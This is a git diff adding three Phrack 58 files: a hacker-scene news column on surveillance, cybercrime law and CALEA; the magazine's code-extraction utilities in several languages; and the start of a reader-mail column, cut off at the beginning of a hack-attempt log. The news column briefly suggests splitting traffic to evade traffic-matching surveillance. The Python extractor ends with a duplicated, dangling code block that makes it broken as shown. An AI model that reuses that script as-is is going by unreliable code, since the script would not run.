+|=[ EOF ]=---------------------------------------------------------------=|
+
diff --git a/phrack58/13.txt b/phrack58/13.txt
new file mode 100644
index 0000000..92b6d1b
--- /dev/null
+++ b/phrack58/13.txt
@@ -0,0 +1,252 @@
+                             ==Phrack Inc.==
+               Volume 0x0b, Issue 0x3a, Phile #0x0d of 0x0e
+
+|=----------------=[ P H R A C K  W O R L D  N E W S ]=------------------=|
+|=-----------------------------------------------------------------------=|
+|=---------------------------=[ phrackstaff ]=---------------------------=|
+
+  
+  Content in this news does not reflect the opinion of any particluar
+phrack staff member. The news is exclusively done by the scene and
+for the scene.
+In cleartext this means that we honestly do not care if you feel
+uncomfortable or offended by the news - in fact PWN is a place many
+people use to express _their_ opinion and to tell the world about
+what's going wrong.
+
+You have the chance to complain about this at: loopback@phrack.org.
+If you feel the need to submit news, do so at: disorder@phrack.org.
+
+If you think you are smart enough to moderate the PWN in Phrack #59 then
+take a deep breath and think about it again. If you still think you can 
+make it, mail us at phrackstaff@phrack.org. 
+
+Today's PWN is dedicated to the MPAA, the FBI, SecretService
+and any other world domination organization. 
+
+  0x01: cDc media control
+  0x02: Hack-orist
+  0x03: First international treaty on cybercrime
+  0x04: CALEA - how we pay others to spy on us
+  0x05: various news
+  
+
+|=[ 0x01 - cDc media control ]=------------------------------------------=|
+
+  At Hope2000/NYC cDc leadership announced a new project of building an
+infrastructure of tunnels and access points to grant unrestricted access
+to the internet to users from foreign countries who are legally not allowed
+to surf outside the government applied borders of 'their' internet.
+China was one of their targets.
+
+  The very same group announced on the 26th of Nov their cooperation
+with the FBI to plan, build and deploy best-of-breed electronic surveillance
+software.
+
+   http://cultdeadcow.com/details.php3?listing_id=425
+
+  The story rushed through the newstickers of the world and was soon
+picked up by other news agencies...not realizing the excellent work of
+satire by cDc. 
+
+   http://www.vnunet.com/News/1127639
+
+Amazing how easy it is to bluff big new agencies.....no comment.
+
+FBI's new toy (Magic Lantern, virus-like keystroke logger):
+URL: http://www.msnbc.com/news/660096.asp?cp1=1
+
+  Reports are coming in about the new FBI traffic matching device
+becoming fully operational. Traffic matching devices are long known to
+various agencies but have not been used widely across the internet.
+The basic idea is to build a network of drones/sniffers which records
+traffic 'waves' for a limited time period. A master can search through
+all drones/sniffers and determine the path of a 'wave' (e.g traffic peak)
+through the internet. The results are the same for crypted (ssh, ipsec, ..)
+or bounced connections - as long as traffic flows from the source to
+the destination. Padding the traffic with random data does not fool the
+device. This is basic knowledge for anyone familiar with wavelets
+transformation (Random padded data would just result in a few more
+'wavelet stars' in a visualized wavelet transformation). 
+
+SSH in line mode (axssh) is not enough to fool the device. Splitting
+the traffic stream into many fake streams may fool the device. The
+required amount of traffic is most often not acceptable.
+
+URL: http://hes.iki.fi/pub/ham/unix/utils/
+URL: http://www.wavelets.com
+
+
+|=[ 0x02 - Hack-orist ]=--------------------------------------------------=|
+
+Russ Cooper want all of you virus writers/Hackorists in jail:
+http://www.wired.com/news/politics/0,1283,49313-2,00.html
+
+Hackers face life imprisonment under 'Anti-Terrorism' Act:
+http://www.securityfocus.com/news/257
+
+Electronic Pearl Harbor and the fear against Super-Hackers:
+http://www.securityfocus.com/news/280
+
+Random quotes:
+"Most of the terrorism offenses are violent crimes, or crimes involving
+ chemical, biological, or nuclear weapons. But the list also includes the
+ provisions of the Computer Fraud and Abuse Act that make it illegal to
+ crack a computer for the purpose of obtaining anything of value [..].
+ Likewise, launching a malicious program [..] are included in the
+ definition of terrorism."
+
+"To date no terrorists are known to have violated the Computer Fraud and 
+ Abuse Act."
+
+"... the five year statute of limitations for hacking would be abolished
+ retroactively -- allowing computer crimes committed decades ago to be
+ prosecuted today -- and the maximum prison term for a single conviction
+ would be upped to life imprisonment. There is no parole in the federal
+ justice system.
+ Those convicted of providing "advice or assistance" to cyber crooks, or
+ harboring or concealing a computer intruder, would face the same legal
+ repercussions as an intrude."
+
+
+|=[ 0x03 - First international treaty on cybercrime ]=-------------------=|
+
+  The Council of Europe (CoE) published their latest elaboration of
+the Cybercrime treaty. The Council has been established after World War II
+in 1949. Since then the CoE takes care of the preparation and the
+negotiation of European conventions and agreements. In its 52 years of
+existence the CoE published 185 treaties (one paper every 4 month - that's
+what you pay taxes for). Most of the treaties are publicly available on the
+internet - with all classified information stripped out (yes, you also
+pay taxes for the dude who strips out the information we are all most 
+interested in).
+
+Let's sum up what this 'First international treaty on cybercrime' is about:
+- Anti-warez, computer-related fraud, violation of network security.
+- Powers and procedures such as the search of computer networks
+  and interception.
+- Fostering international co-operation.
+- As written in the preamble: "to protect the society against cybercrime".
+- (Article 19/2.2c) Allows 'competent authorities' to modify or delete
+  data on a suspect's computer.
+- Force different ISP's to log and disclose traffic-data of a suspect
+  up to a maximum of 90 days (Article 16 + 20/1b.ii + 21).
+- Extradition of suspects who are punishable under these laws (A 24/1-7).
+- Mutual assistance to the widest extent possible. A29 explicitely 
+  gives a requesting party the right to order a requested party to
+  seizure or disclose computer data.
+
+  The treaty has been opened for signature on 23/11/01. 27 out of 43
+countries gave their signature on the same day (including UK, Netherlands,
+Italy, Iceland, Germany, France, ...). Four non-member States of the
+Council of Europe signed the same as a sign of respect and support (USA,
+South Africe, Japan and Canada).
+
+The entire treaty is available at:
+http://conventions.coe.int/Treaty/EN/projets/FinalCybercrime.htm
+
+
+|=[ 0x04 - Communications Assistance for Law Enforcement Act ]=----------=|
+
+aka CALEA [1].
+
+   'The mission of the CALEA Implementation Section is to preserve
+    Law Enforcement's ability to conduct lawfully-authorized electronic
+    surveillance while preserving public safety, the public's right to
+    privacy, and the telecommunications industry's competitiveness.'
+
+CARL CAMERON, FOX NEWS CORRESPONDENT (voice-over):  The company is Comverse
+Infosys, a subsidiary of an Israeli-run private telecommunications firm,
+with offices throughout the U.S.  It provides wiretapping equipment for law
+enforcement.  Here's how wiretapping works in the U.S.
+
+Every time you make a call, it passes through the nation's elaborate network
+of switchers and routers run by the phone companies.  Custom computers and
+software, made by companies like Comverse, are tied into that network to
+intercept, record and store the wiretapped calls, and at the same time
+transmit them to investigators.
+
+The manufacturers have continuing access to the computers so they can
+service them and keep them free of glitches.  This process was authorized by
+the 1994 Communications Assistance for Law Enforcement Act, or CALEA.
+Senior government officials have now told Fox News that while CALEA made
+wiretapping easier, it has led to a system that is seriously vulnerable to
+compromise, and may have undermined the whole wiretapping system.
+
+Indeed, Fox News has learned that Attorney General John Ashcroft and  FBI
+Director Robert Mueller were both warned Oct. 18 in a hand-delivered letter
+from 15 local, state and federal law enforcement  officials, who complained
+that "law enforcement's current  electronic surveillance capabilities are
+less effective today than they  were at the time CALEA was enacted."
+
+Congress [probably means Comverse --DBM] insists the equipment it installs
+is secure.  But the  complaint about this system is that the wiretap
+computer programs made by Comverse have, in effect, a back door through
+which wiretaps themselves can be intercepted by unauthorized parties.
+
+Adding to the suspicions is the fact that in Israel, Comverse works closely
+with the Israeli government, and under special programs, gets reimbursed
+for up to 50 percent of its research and development costs by the Israeli
+Ministry of Industry and Trade. But investigators within the DEA, INS and
+FBI have all told Fox News that to pursue or even suggest Israeli spying
+through Comverse is considered career suicide.
+
+And sources say that while various F.B.I. inquiries into Comverse have been
+conducted over the years, they've been halted before the actual equipment
+has ever been thoroughly tested for leaks.  A 1999 F.C.C. document
+indicates several government agencies expressed deep concerns that too many
+unauthorized non-law enforcement personnel can access the wiretap system.
+And the FBI's own nondescript office in Chantilly, Virginia that actually
+oversees the CALEA wiretapping program, is among the most agitated about
+the threat.
+
+But there is a bitter turf war internally at F.B.I. It is the FBI's office
+in Quantico, Virginia, that has jurisdiction over awarding contracts and
+buying intercept equipment.  And for years, they've thrown much of the
+business to Comverse.  A handful of former U.S. law enforcement officials
+involved in awarding Comverse government contracts over the years now work
+for the company.
+
+Numerous sources say some of those individuals were asked to leave
+government service under what knowledgeable sources call "troublesome
+circumstances" that remain under administrative review within the Justice
+Department.
+
+Comments from Mr. Dean, Vice President for Technology Policy:
+
+   "From the beginning, both the political Right and Left warned Congress
+    and the FBI that they were making a huge mistake by implementing CALEA.
+    That it would jeopardize the security of private communications,
+    whether it's between a mother and her son or between government
+    officials. The statement just issued by law enforcement agencies has
+    confirmed our worst fears."
+
+
+Do you want to know more?
+[1] http://www.askcalea.net/
+
+
+|=[ 0x05 - various news ]=-----------------------------------------------=|
+
+Uncle Sam wants you to become a 'High-Tech-Crime-Network certificated
+investigator' today! I thought the CISSP requirements cant be topped....
+http://www.htcn.org/
+
+2001 - Captured the flag
+<dude1> ssh and login exploitable
+<foo2> heh i remember joking about these things a few years ago
+
+DeCSS has been ruled "speech" by a California State Appeals Court,
+overturning the lower court ruling.  Good news!
+http://www.wired.com/news/print/0,1294,48075,00.html
+http://www.courtinfo.ca.gov/courts/courtsofappeal/6thDistrict/
+http://slashdot.org/yro/01/11/01/1953236.shtml
+http://www.theregister.co.uk/content/55/22613.html
+
+Operation Buccaneer (aka Operation Sundevil-II).
+(announced as the 'multi billion dollar bust' in the media).
+http://www.theregister.co.uk/content/4/23329.html
+http://www.wikipedia.com/wiki/DrinkOrDie
+
+|=[ EO PWN ]=------------------------------------------------------------=|
+
diff --git a/phrack58/14.txt b/phrack58/14.txt
new file mode 100644
index 0000000..aa38f35
--- /dev/null
+++ b/phrack58/14.txt
@@ -0,0 +1,754 @@
+                             ==Phrack Inc.==
+
+               Volume 0x0b, Issue 0x3a, Phile #0x0e of 0x0e
+
+|=--------=[ P H R A C K   E X T R A C T I O N   U T I L I T Y ]=--------=|
+|=-----------------------------------------------------------------------=|
+|=--------------------------=[ phrackstaff ]=----------------------------=|
+
+The Phrack Magazine Extraction Utility, first appearing in P50, is a convenient
+way to extract code from textual ASCII articles.  It preserves readability and
+7-bit clean ASCII codes.  As long as there are no extraneous "<++>" or <-->" in
+the article, everything runs swimmingly.
+
+Source and precompiled version (windows, unix, ...) is available at
+http://www.phrack.org/misc.
+
+|-----------------------------------------------------------------------------|
+
+<++> extract/extract4.c !8e2bebc6
+
+/*
+ *  extract.c by Phrack Staff and sirsyko
+ *
+ *  Copyright (c) 1997 - 2000 Phrack Magazine
+ *
+ *  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ *
+ *  extract.c
+ *  Extracts textfiles from a specially tagged flatfile into a hierarchical 
+ *  directory structure.  Use to extract source code from any of the articles 
+ *  in Phrack Magazine (first appeared in Phrack 50).
+ *
+ *  Extraction tags are of the form:
+ *
+ *  host:~> cat testfile
+ *  irrelevant file contents
+ *  <++> path_and_filename1 !CRC32
+ *  file contents
+ *  <-->
+ *  irrelevant file contents
+ *  <++> path_and_filename2 !CRC32
+ *  file contents
+ *  <-->
+ *  irrelevant file contents
+ *  <++> path_and_filenamen !CRC32
+ *  file contents
+ *  <-->
+ *  irrelevant file contents
+ *  EOF
+ *
+ *  The `!CRC` is optional.  The filename is not.  To generate crc32 values 
+ *  for your files, simply give them a dummy value initially.  The program
+ *  will attempt to verify the crc and fail, dumping the expected crc value.
+ *  Use that one.  i.e.:
+ *
+ *  host:~> cat testfile
+ *  this text is ignored by the program
+ *  <++> testarooni !12345678
+ *  text to extract into a file named testarooni
+ *  as is this text
+ *  <--> 
+ *
+ *  host:~> ./extract testfile
+ *  Opened testfile
+ *   - Extracting testarooni
+ *   crc32 failed (12345678 != 4a298f18)
+ *  Extracted 1 file(s).  
+ *
+ *  You would use `4a298f18` as your crc value.
+ *
+ *  Compilation:
+ *  gcc -o extract extract.c
+ *  
+ *  ./extract file1 file2 ... filen
+ */
+
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <sys/stat.h>
+#include <sys/types.h>
+#include <string.h>
+#include <dirent.h>
+#include <fcntl.h>
+#include <unistd.h>
+#include <errno.h>
+
+#define VERSION         "7niner.20000430 revsion q"
+
+#define BEGIN_TAG       "<++> "
+#define END_TAG         "<-->"
+#define BT_SIZE         strlen(BEGIN_TAG)
+#define ET_SIZE         strlen(END_TAG)
+#define EX_DO_CHECKS    0x01
+#define EX_QUIET        0x02
+
+struct f_name
+{
+    u_char name[256];
+    struct f_name *next;
+};
+
+unsigned long crcTable[256];
+
+
+void crcgen() 
+{
+    unsigned long crc, poly;
+    int i, j;
+    poly = 0xEDB88320L;
+    for (i = 0; i < 256; i++)
+    {
+        crc = i;
+        for (j = 8; j > 0; j--)
+        {
+            if (crc & 1)
+            {
+                crc = (crc >> 1) ^ poly;
+            } 
+            else
+            {
+                crc >>= 1;
+            }
+        }
+        crcTable[i] = crc;
+    }
+}
+
+        
+unsigned long check_crc(FILE *fp)
+{
+    register unsigned long crc;
+    int c;
+
+    crc = 0xFFFFFFFF;
+    while( (c = getc(fp)) != EOF )
+    {
+         crc = ((crc >> 8) & 0x00FFFFFF) ^ crcTable[(crc ^ c) & 0xFF];
+    }
+ 
+    if (fseek(fp, 0, SEEK_SET) == -1)
+    {
+        perror("fseek");
+        exit(EXIT_FAILURE);
+    }
+
+    return (crc ^ 0xFFFFFFFF);
+}
+
+
+int
+main(int argc, char **argv)
+{ 
+    char *name;
+    u_char b[256], *bp, *fn, flags;
+    int i, j = 0, h_c = 0, c;
+    unsigned long crc = 0, crc_f = 0;
+    FILE *in_p, *out_p = NULL;
+    struct f_name *fn_p = NULL, *head = NULL, *tmp = NULL;
+
+    while ((c = getopt(argc, argv, "cqv")) != EOF)
+    {
+        switch (c)
+        {
+            case 'c':
+                flags |= EX_DO_CHECKS;
+                break;
+            case 'q':
+                flags |= EX_QUIET;
+                break;
+            case 'v':
+                fprintf(stderr, "Extract version: %s\n", VERSION);
+                exit(EXIT_SUCCESS);
+        }
+    }
+    c = argc - optind;
+
+    if (c < 2)
+    {
+        fprintf(stderr, "Usage: %s [-cqv] file1 file2 ... filen\n", argv[0]);
+        exit(0); 
+    }
+
+    /*
+     *  Fill the f_name list with all the files on the commandline (ignoring
+     *  argv[0] which is this executable).  This includes globs.
+     */
+    for (i = 1; (fn = argv[i++]); )
+    {
+        if (!head)
+        {
+            if (!(head = (struct f_name *)malloc(sizeof(struct f_name))))
+            {
+                perror("malloc");
+                exit(EXIT_FAILURE);
+            }
+            strncpy(head->name, fn, sizeof(head->name));
+            head->next = NULL;
+            fn_p = head;
+        }
+        else
+        {
+            if (!(fn_p->next = (struct f_name *)malloc(sizeof(struct f_name))))
+            {
+                perror("malloc");
+                exit(EXIT_FAILURE);
+            }
+            fn_p = fn_p->next;
+            strncpy(fn_p->name, fn, sizeof(fn_p->name));
+            fn_p->next = NULL;
+        }
+    }
+    /*
+     *  Sentry node.
+     */
+    if (!(fn_p->next = (struct f_name *)malloc(sizeof(struct f_name))))
+    {
+        perror("malloc");
+        exit(EXIT_FAILURE);
+     }
+    fn_p = fn_p->next;
+    fn_p->next = NULL;
+
+    /*
+     *  Check each file in the f_name list for extraction tags.
+     */
+    for (fn_p = head; fn_p->next; )
+    {
+        if (!strcmp(fn_p->name, "-"))
+        {
+            in_p = stdin;
+            name = "stdin";
+        }
+        else if (!(in_p = fopen(fn_p->name, "r")))
+        {
+            fprintf(stderr, "Could not open input file %s.\n", fn_p->name);
+            fn_p = fn_p->next;
+	    continue;
+        }
+        else
+        {
+            name = fn_p->name;
+        }
+
+        if (!(flags & EX_QUIET))
+        {
+            fprintf(stderr, "Scanning %s...\n", fn_p->name);
+        }
+        crcgen();
+        while (fgets(b, 256, in_p))
+        { 
+            if (!strncmp(b, BEGIN_TAG, BT_SIZE))
+            {
+	        b[strlen(b) - 1] = 0;           /* Now we have a string. */
+                j++;
+
+                crc = 0;
+                crc_f = 0;
+                if ((bp = strchr(b + BT_SIZE + 1, '/')))
+                {
+                    while (bp)
+                    {
+		        *bp = 0;
+                        if (mkdir(b + BT_SIZE, 0700) == -1 && errno != EEXIST)
+                        {
+                            perror("mkdir");
+                            exit(EXIT_FAILURE);
+                        }
+                        *bp = '/';
+		        bp = strchr(bp + 1, '/'); 
+		    }
+                }
+
+                if ((bp = strchr(b, '!')))
+                {
+                    crc_f = 
+                        strtoul((b + (strlen(b) - strlen(bp)) + 1), NULL, 16);
+                   b[strlen(b) - strlen(bp) - 1 ] = 0;
+                   h_c = 1;
+                }
+                else
+                {
+                    h_c = 0;
+                }
+                if ((out_p = fopen(b + BT_SIZE, "wb+")))
+                {
+                    fprintf(stderr, ". Extracting %s\n", b + BT_SIZE);
+                }
+                else
+                {
+        	    printf(". Could not extract anything from '%s'.\n",
+                        b + BT_SIZE);
+        	    continue;
+                }
+            }
+            else if (!strncmp (b, END_TAG, ET_SIZE))
+            {
+                if (out_p)
+                {
+                    if (h_c == 1)
+                    {
+                        if (fseek(out_p, 0l, 0) == -1)
+                        {
+                            perror("fseek");
+                            exit(EXIT_FAILURE);
+                        }
+                        crc = check_crc(out_p);
+                        if (crc == crc_f && !(flags & EX_QUIET))
+                        {
+                            fprintf(stderr, ". CRC32 verified (%08lx)\n", crc);
+                        }
+                        else
+                        {
+                            if (!(flags & EX_QUIET))
+                            {
+                                fprintf(stderr, ". CRC32 failed (%08lx != %08lx)\n",
+                                        crc_f, crc);
+                            }
+                        }
+                    }
+                    fclose(out_p);
+                }
+	        else
+                {
+	            fprintf(stderr, ". `%s` had bad tags.\n", fn_p->name);
+		    continue;
+	        }
+            }
+            else if (out_p)
+            {
+                fputs(b, out_p);
+            }
+        }
+        if (in_p != stdin)
+        {
+            fclose(in_p);
+        }
+        tmp = fn_p;
+        fn_p = fn_p->next;
+        free(tmp);
+    }
+    if (!j)
+    {
+        printf("No extraction tags found in list.\n");
+    }
+    else
+    {
+        printf("Extracted %d file(s).\n", j);
+    }
+    return (0);
+}
+/* EOF */
+<-->
+<++> extract/extract.pl !1a19d427
+# Daos <daos@nym.alias.net>
+#!/bin/sh -- # -*- perl -*- -n
+eval 'exec perl $0 -S ${1+"$@"}' if 0;
+
+$opening=0;
+
+if (/^\<\+\+\>/) {$curfile = substr($_ , 5); $opening=1;};
+if (/^\<\-\-\>/) {close ct_ex; $opened=0;}; 
+if ($opening) {                        
+        chop $curfile;                 
+        $sex_dir= substr( $curfile, 0, ((rindex($curfile,'/'))) ) if ($curfile =~ m/\//);
+        eval {mkdir $sex_dir, "0777";}; 
+        open(ct_ex,">$curfile"); 
+        print "Attempting extraction of $curfile\n";
+        $opened=1; 
+}
+if ($opened && !$opening) {print ct_ex $_}; 
+<-->
+
+<++> extract/extract.awk !26522c51
+#!/usr/bin/awk -f
+#
+# Yet Another Extraction Script
+# - <sirsyko>
+#
+/^\<\+\+\>/ {
+        ind = 1
+        File = $2
+        split ($2, dirs, "/")
+        Dir="."
+        while ( dirs[ind+1] ) {
+                Dir=Dir"/"dirs[ind]
+                system ("mkdir " Dir" 2>/dev/null")
+                ++ind
+        }
+        next
+}
+/^\<\-\-\>/ {
+        File = ""
+        next
+}
+File { print >> File }
+<-->
+<++> extract/extract.sh !a81a2320
+#!/bin/sh
+# exctract.sh : Written 9/2/1997 for the Phrack Staff by <sirsyko>
+#
+# note, this file will create all directories relative to the current directory
+# originally a bug, I've now upgraded it to a feature since I dont want to deal
+# with the leading / (besides, you dont want hackers giving you full pathnames
+# anyway, now do you :)
+# Hopefully this will demonstrate another useful aspect of IFS other than 
+# haxoring rewt
+#
+# Usage: ./extract.sh <filename>
+
+cat $* | (
+Working=1
+while [ $Working ];
+do
+        OLDIFS1="$IFS"
+        IFS=
+        if read Line; then
+                IFS="$OLDIFS1"
+                set -- $Line
+                case "$1" in
+                "<++>") OLDIFS2="$IFS"
+                        IFS=/
+                        set -- $2
+                        IFS="$OLDIFS2"
+                        while [ $# -gt 1 ]; do
+                                File=${File:-"."}/$1
+                                if [ ! -d $File ]; then
+                                        echo "Making dir $File"
+                                        mkdir $File
+                                fi
+                                shift
+                        done                               
+                        File=${File:-"."}/$1
+                        echo "Storing data in $File"
+                ;;
+                "<-->") if [ "x$File" != "x" ]; then
+                                unset File
+                        fi ;;
+                *)      if [ "x$File" != "x" ]; then
+                                        IFS=
+                                        echo "$Line" >> $File
+                                        IFS="$OLDIFS1"
+                        fi
+                ;;
+                esac
+                IFS="$OLDIFS1"
+        else
+                echo "End of file"
+                unset Working
+        fi
+done
+)                                                                    
+<-->
+<++> extract/extract.py !83f65f60
+#! /bin/env python
+# extract.py    Timmy 2tone <_spoon_@usa.net>
+
+import sys, string, getopt, os
+
+class Datasink:
+    """Looks like a file, but doesn't do anything."""
+    def write(self, data): pass
+    def close(self): pass
+
+def extract(input, verbose = 1):
+    """Read a file from input until we find the end token."""
+
+    if type(input) == type('string'):
+        fname = input
+        try: input = open(fname)
+        except IOError, (errno, why):
+            print "Can't open %s: %s" % (fname, why)
+            return errno
+    else:
+        fname = '<file descriptor %d>' % input.fileno()
+
+    inside_embedded_file = 0
+    linecount = 0
+    line = input.readline()
+    while line:
+
+        if not inside_embedded_file and line[:4] == '<++>':
+
+            inside_embedded_file = 1
+            linecount = 0
+
+            filename = string.strip(line[4:])
+            if mkdirs_if_any(filename) != 0:
+                pass
+
+            try: output = open(filename, 'w')
+            except IOError, (errno, why):
+                print "Can't open %s: %s; skipping file" % (filename, why)
+                output = Datasink()
+                continue
+
+            if verbose:
+                print 'Extracting embedded file %s from %s...' % (filename,
+                                                                  fname),
+
+        elif inside_embedded_file and line[:4] == '<-->':
+            output.close()
+            inside_embedded_file = 0
+            if verbose and not isinstance(output, Datasink):
+                print '[%d lines]' % linecount
+
+        elif inside_embedded_file:
+            output.write(line)
+
+        # Else keep looking for a start token.
+        line = input.readline()
+        linecount = linecount + 1
+
+def mkdirs_if_any(filename, verbose = 1):
+    """Check for existance of /'s in filename, and make directories."""
+
+    path, file = os.path.split(filename)
+    if not path: return
+
+    errno = 0
+    start = os.getcwd()
+    components = string.split(path, os.sep)
+    for dir in components:
+        if not os.path.exists(dir):
+            try:
+                os.mkdir(dir)
+                if verbose: print 'Created directory', path
+
+            except os.error, (errno, why):
+                print "Can't make directory %s: %s" % (dir, why)
+                break
+
+        try: os.chdir(dir)
+        except os.error, (errno, why):
+            print "Can't cd to directory %s: %s" % (dir, why)
+            break
+
+    os.chdir(start)
+    return errno
+
+def usage():
+    """Blah."""
+    die('Usage: extract.py [-V] filename [filename...]')
+
+def main():
+    try: optlist, args = getopt.getopt(sys.argv[1:], 'V')
+    except getopt.error, why: usage()
+    if len(args) <= 0: usage()
+
+    if ('-V', '') in optlist: verbose = 0
+    else: verbose = 1
+
+    for filename in args:
+        if verbose: print 'Opening source file', filename + '...'
+        extract(filename, verbose)
+
+def db(filename = 'P51-11'):
+    """Run this script in the python debugger."""
+    import pdb
+    sys.argv[1:] = ['-v', filename]
+    pdb.run('extract.main()')
+
+def die(msg, errcode = 1):
+    print msg
+    sys.exit(errcode)
+
+if __name__ == '__main__':
+    try: main()
+    except KeyboardInterrupt: pass
+
+
+    except getopt.error, why: usage()
+    if len(args) <= 0: usage()
+
+    if ('-V', '') in optlist: verbose = 0
+    else: verbose = 1
+
+    for filename in args:
+        if verbose: print 'Opening source file', filename + '...'
+        extract(filename, verbose)
+
+def db(filename = 'P51-11'):
+    """Run this script in the python debugger."""
+    import pdb
+    sys.argv[1:] = [filename]
+    pdb.run('extract.main()')
+
+def die(msg, errcode = 1):
+    print msg
+    sys.exit(errcode)
+
+if __name__ == '__main__':
+    try: main()
+    except KeyboardInterrupt: pass              # No messy traceback.
+<-->
+<++> extract/extract-win.c !e519375d
+/***************************************************************************/
+/* WinExtract                                                              */
+/*                                                                         */
+/* Written by Fotonik <fotonik@game-master.com>.                           */
+/*                                                                         */
+/* Coding of WinExtract started on 22aug98.                                */
+/*                                                                         */
+/* This version (1.0) was last modified on 22aug98.                        */
+/*                                                                         */
+/* This is a Win32 program to extract text files from a specially tagged   */
+/* flat file into a hierarchical directory structure.  Use to extract      */
+/* source code from articles in Phrack Magazine.  The latest version of    */
+/* this program (both source and executable codes) can be found on my      */
+/* website:  http://www.altern.com/fotonik                                 */
+/***************************************************************************/
+
+
+#include <stdio.h>
+#include <string.h>
+#include <windows.h>
+
+
+void PowerCreateDirectory(char *DirectoryName);
+
+
+int WINAPI WinMain(HINSTANCE hThisInst, HINSTANCE hPrevInst,
+                   LPSTR lpszArgs, int nWinMode)
+{
+OPENFILENAME OpenFile; /* Structure for Open common dialog box */
+char InFileName[256]="";
+char OutFileName[256];
+char Title[]="WinExtract - Choose a file to extract files from.";
+FILE *InFile;
+FILE *OutFile;
+char Line[256];
+char DirName[256];
+int FileExtracted=0;   /* Flag used to determine if at least one file was */
+int i;                 /* extracted */
+
+ZeroMemory(&OpenFile, sizeof(OPENFILENAME));
+OpenFile.lStructSize=sizeof(OPENFILENAME);
+OpenFile.hwndOwner=HWND_DESKTOP;
+OpenFile.hInstance=hThisInst;
+OpenFile.lpstrFile=InFileName;
+OpenFile.nMaxFile=sizeof(InFileName)-1;
+OpenFile.lpstrTitle=Title;
+OpenFile.Flags=OFN_FILEMUSTEXIST | OFN_HIDEREADONLY;
+
+if(GetOpenFileName(&OpenFile))
+   {
+   if((InFile=fopen(InFileName,"r"))==NULL)
+      {
+      MessageBox(NULL,"Could not open file.",NULL,MB_OK);
+      return 0;
+      }
+
+   /* If we got here, InFile is opened. */
+   while(fgets(Line,256,InFile))
+      {
+      if(!strncmp(Line,"<++> ",5)) /* If line begins with "<++> " */
+         {
+         Line[strlen(Line)-1]='\0';
+         strcpy(OutFileName,Line+5);
+
+         /* Check if a dir has to be created and create one if necessary */
+         for(i=strlen(OutFileName)-1;i>=0;i--)
+            {
+            if((OutFileName[i]=='\\')||(OutFileName[i]=='/'))
+               {
+               strncpy(DirName,OutFileName,i);
+               DirName[i]='\0';
+               PowerCreateDirectory(DirName);
+               break;
+               }
+            }
+
+         if((OutFile=fopen(OutFileName,"w"))==NULL)
+            {
+            MessageBox(NULL,"Could not create file.",NULL,MB_OK);
+            fclose(InFile);
+            return 0;
+            }
+
+         /* If we got here, OutFile can be written to */
+         while(fgets(Line,256,InFile))
+            {
+            if(strncmp(Line,"<-->",4)) /* If line doesn't begin w/ "<-->" */
+               {
+               fputs(Line, OutFile);
+               }
+            else
+               {
+               break;
+               }
+            }
+         fclose(OutFile);
+         FileExtracted=1;
+         }
+      }
+   fclose(InFile);
+   if(FileExtracted)
+      {
+      MessageBox(NULL,"Extraction sucessful.","WinExtract",MB_OK);
+      }
+   else
+      {
+      MessageBox(NULL,"Nothing to extract.","Warning",MB_OK);
+      }
+   }
+   return 1;
+}
+
+
+/* PowerCreateDirectory is a function that creates directories that are */
+/* down more than one yet unexisting directory levels.  (e.g. c:\1\2\3) */
+void PowerCreateDirectory(char *DirectoryName)
+{
+int i;
+int DirNameLength=strlen(DirectoryName);
+char DirToBeCreated[256];
+
+for(i=1;i<DirNameLength;i++) /* i starts at 1, because we never need to */
+   {                         /* create '/' */
+   if((DirectoryName[i]=='\\')||(DirectoryName[i]=='/')||
+      (i==DirNameLength-1))
+      {
+      strncpy(DirToBeCreated,DirectoryName,i+1);
+      DirToBeCreated[i+1]='\0';
+      CreateDirectory(DirToBeCreated,NULL);
+      }
+   }
+}
+<-->
+
+|=[ EOF ]=---------------------------------------------------------------=|
+
diff --git a/phrack58/2.txt b/phrack58/2.txt
new file mode 100644
index 0000000..989edc9
--- /dev/null
+++ b/phrack58/2.txt
@@ -0,0 +1,437 @@
+                             ==Phrack Inc.==
+
+               Volume 0x0b, Issue 0x3a, Phile #0x02 of 0x0e
+
+|=------------------------=[ L O O P B A C K ]=--------------------------=|
+|=-----------------------------------------------------------------------=|
+|=--------------------------=[ phrackstaff ]=----------------------------=|
+
+
+  Our mailboxes were flooded by replies....99% of them should have gone to
+/dev/null - 1% of these 99% are published below. Let's start with some logs
+of hack attempts we experienced on our own server and from logs sent to us
+by other readers (sorted in descending order, most stupid hacker first...).
+
+* PHRACK58/#phrack will not be released until the 29th, sorry everyone!
+<#phrack:zknown_> are you serious?
+<#phrack:PHRACK58> You'll have to wait for me to retype everything from
+                   the hardcopy edition.
+<#phrack:PHRACK58> someone, release phrack now...
+<#phrack:tknown> who releases phrack
+<#phrack:PHRACK58> we'd like to gather a crowd to witness that historic
+                   event.
+-:- PHRACK58 was kicked off #phrack by rknown (please work out your issues)
+
+  [ From time to time people pretend or try to impersonate 'phrack'
+    and spread false informations :> Phrack will be released on schedule..]
+
+
+|=[ 0x00 ]=--------------------------------------------------------------=|
+
+<timelog, some phrackstaff host>
+[08:34] - Just another scan from a.b.c.d (nothing unusual, our host is the
